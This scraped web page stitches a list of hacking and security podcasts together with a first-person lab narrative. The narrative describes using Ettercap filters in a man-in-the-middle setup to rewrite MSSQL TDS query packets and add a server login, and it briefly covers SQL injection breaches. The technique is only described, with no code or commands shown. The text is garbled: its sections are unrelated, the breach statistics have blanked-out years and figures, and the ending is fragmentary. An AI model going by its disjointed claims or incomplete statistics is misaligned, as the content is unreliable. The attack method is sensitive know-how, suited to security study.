Real hackers are not the ones breaking into systems, stealing credit cards, and causing havoc. Real hackers build the technology that changes the world for the better. Kenny is a human-computer interaction whiz at Apple. Two best friends report daily from the depths of Hacker News. San Francisco, California, US Software Engineering Daily podcast tells the stories of people hacking on weird and interesting projects.
Stay tuned to listen to the latest updates. Seattle, Washington, US For hackers, by hackers. Top shelf security training. We see lots of movies and TV shows where hackers can infiltrate our lives with just a few keystrokes. Malicious cat photos, sketchy Wi-Fi networks, rogue rentals, all-knowing webcams - those are just a few topics tackled in Hackable, where we let our hackers shed light on just how secure we really are. Boston, Massachusetts, US What really happens when a hacker snatches all your data?
Breach digs into the who, why and how of history's most notorious data breaches. Hosted by journalist Bob Sullivan and producer Alia Tavakolian. InsecureSpace podcast is all about the experience from the hacker and maker community.
Also in Vice Podcasts play. Seattle, Washington, US For hackers, by hackers. Have a computer security question? Stuck on a pentest? Seattle, Washington, US Mark Maunder co-founded Wordfence in after his WordPress site was hacked and he learned how hard it was to clean and secure. Today the team has grown to over 35 members world-wide and Wordfence protects over 3 million WordPress sites.
Join Mark as he and his colleague Kathy Zant cover interesting topics related to WordPress, security, and innovation. Episodes alternate between security news and interviews with innovators from WordPress and information security communities. UK Offers the latest hacking news and cyber security courses for ethical hackers, penetration testers, IT security experts and essentially anyone with hacker interests.
Category Computer security Computer occupations Cybercrime Cyberpunk themes. Feedspot has a team of over 50 experts whose goal is to discover and rank blogs, podcasts and youtube channels in several niche categories.
Publishers submit their blogs or podcasts on Feedspot using the form at the top of this page. Our expert editorial team reviews and adds them to a relevant category list. One of the best places to start is the most infamous software weakness of all: SQL injection. At some point in , according to X-Force research , SQL injection attacks were responsible for more than half of all data breaches where the attack type had been disclosed. While that number has decreased in , it is still one of the main attack vectors being used.
In , cybercriminals made off with information from as many as million debit and credit cards in the Heartland Payment Systems data breach. At the time, it was the largest data breach ever, and SQL injection was the culprit. SQL injection gets introduced when a developer concatenates user input into a database query. The code selects from the users table any record that matches the specified username and password. Leaving aside the fact that the password is stored in cleartext, the query can be manipulated and transformed by the user, which is never good.
The database is called testdb and includes one table called Products. There is no actual data in the table, but for this test that is unnecessary. This query is designed to pull all information from the database table. The query was executed successfully and the empty table was returned to me.
You can see the empty columns listed toward the bottom-right of the screenshot. Switching back to Wireshark, I stopped the capture and looked at the captured data. I spotted one TDS query packet. Clicking on that packet showed me all of the data contained within. It even includes the carriage return and newline characters. Something interesting to notice is that in between each character of the query is a null byte hexadecimal 0x00 which is normal for Unicode.
This is only noticeable when looking at the raw data in the bottom pane. Wireshark displays these bytes as period characters but really, they are null. Now that I knew what the data looked like, I could try to find a way to manipulate it.
I decided to use Ettercap. Ettercap is a tool specifically designed to perform MITM attacks. It also has a nifty built-in feature called Ettercap filters.
A filter would allow me to search the packets for specific data and then manipulate that data. You just write the filter and load it into Ettercap. Then Ettercap automatically replaces data every time it finds a match. The functionality is somewhat limited, but it should work for proof of concept. The filters are written in a simple scripting language. The important functions I intended to use were the search and replace functions.
The search function will search for specific data within the packets. The replace function will actually search for data and then replace it with other data. That was the key to this project.
Since the TDS query data includes those null bytes, some of the characters are not printable. This meant that I could not merely search for a simple string and replace it with another string.
I needed a way to search for a non-printable null byte. Since I cannot type null on a keyboard, I needed another way. Kali includes a program called hexdump that can be used to convert strings to hexadecimal.
The first line ensures that the filter will only run on TCP traffic with a destination port of If this matches, the filter will output a debugging message to the console to let me know that it found SQL traffic. If the filter locates that string, it will output another debugging message to the console. Finally, the magic happens. This was just a test to see if the script would run properly. It is important to note that when you replace data in a TCP packet, you must replace it with the exact same number of bytes.
If the size of the packet changes, the TCP connection will break. Once the filter is written, it must be compiled. This is easily accomplished with the etterfilter command. There were no errors, so the filter was now ready for testing.
I fired up Wireshark and verified that I was seeing traffic being sent between the two victims. Everything was looking positive. The next step was to switch back to the workstation and try executing the query. I executed the query, but this time I did not receive the empty table result as I did originally. Instead, I received an error.
The filter worked exactly as expected. That was one step in the right direction. The next step was to replace the entire query string with something that will help me as the attacker. I decided to try to add a login to the server. This would be pretty much the best possible scenario for me as an attacker, especially since in this case the workstation victim is logging in as the SA user.
After converting everything to hex, I updated the mssql. I mentioned earlier that you must replace TCP data with the exact same amount of data. So how did I handle that since my new query is shorter than the original? I just added some spaces to the end of my new query with the null bytes surrounding them. I compiled the filter just like before and then loaded it up into Ettercap. Then I submitted the query from the workstation. Notice the difference between this response and the response before I used the Ettercap filter?
Originally, the query returned an empty table. This time, no table was returned. Unfortunately, they would be too late.
0コメント